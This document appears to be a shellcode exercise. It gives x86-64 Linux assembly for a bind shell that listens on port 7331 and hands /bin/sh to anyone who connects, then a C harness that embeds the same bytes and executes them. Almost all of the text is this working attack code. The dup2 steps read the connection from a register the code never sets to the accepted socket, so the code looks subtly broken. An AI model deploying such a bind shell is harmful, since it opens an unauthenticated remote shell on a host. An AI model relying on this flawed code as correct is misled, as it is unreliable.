7331 -? '0xa31c' host to network short SYSCALL FOR SOCKET | 41 SYSCALL FOR BIND | 49 SYSCALL FOR LISTEN | 50 SYSCALL FOR ACCEPT | 43 SYSCALL FOR DUP2 | 33 ++++++++++++++++++++++++++++ global _start section .text _start: ;SOCKET SYSCALL xor rax, rax add rax, 41 xor rdi, rdi add rdi, 2 xor rsi, rsi inc rsi xor rdx, rdx syscall ;SAVE SOCKETFD in RDI register mov rdi, rax ;PUSHING PORT NUMBER xor rax, rax push rax push word 0xa31c ; HTON FORMAT 7331 push word 0x02 ; Indicator for IPv4 _ AF_INET ;BIND - 49 mov rsi, rsp xor rdx, rdx add rdx, 16 xor rax, rax add rax, 49 syscall ;LISTEN - 50 xor rax, rax add rax, 50 xor rsi, rsi inc rsi syscall ;ACCEPT - 43 xor rax, rax add rax, 43 xor rsi, rsi xor rdx, rdx syscall ;DUP2 - 33 | STDIN - 0 mov rdi, rbx xor rax, rax add rax, 33 xor rsi, rsi syscall ;DUP2 - 33 | STOUT - 1 xor rax, rax add rax, 33 inc rsi syscall ;DUP2 - 33 | STERR - 2 xor rax, rax add rax, 33 inc rsi syscall ;EXECVE SYCALL xor rax, rax push rax mov rdx, rsp mov rbx, 0x68732f6e69622f2f push rbx mov rdi, rsp push rax push rdi mov rsi, rsp add rax, 59 syscall _____________________________________ #include #include int main(){ unsigned char shellcode[] = "\x48\x31\xc0\x48\x83\xc0\x29\x48\x31\xff\x48\x83\xc7\x02\x48\x31\xf6\x48\xff\xc6\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\x1c\xa3\x66\x6a\x02\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x48\x31\xc0\x48\x83\xc0\x31\x0f\x05\x48\x31\xc0\x48\x83\xc0\x32\x48\x31\xf6\x48\xff\xc6\x0f\x05\x48\x31\xc0\x48\x83\xc0\x2b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x48\x89\xdf\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"; printf("Shellcode Length : %zu\n", strlen((const char*)shellcode)); int (*ret)() = (int(*)())shellcode; ret(); }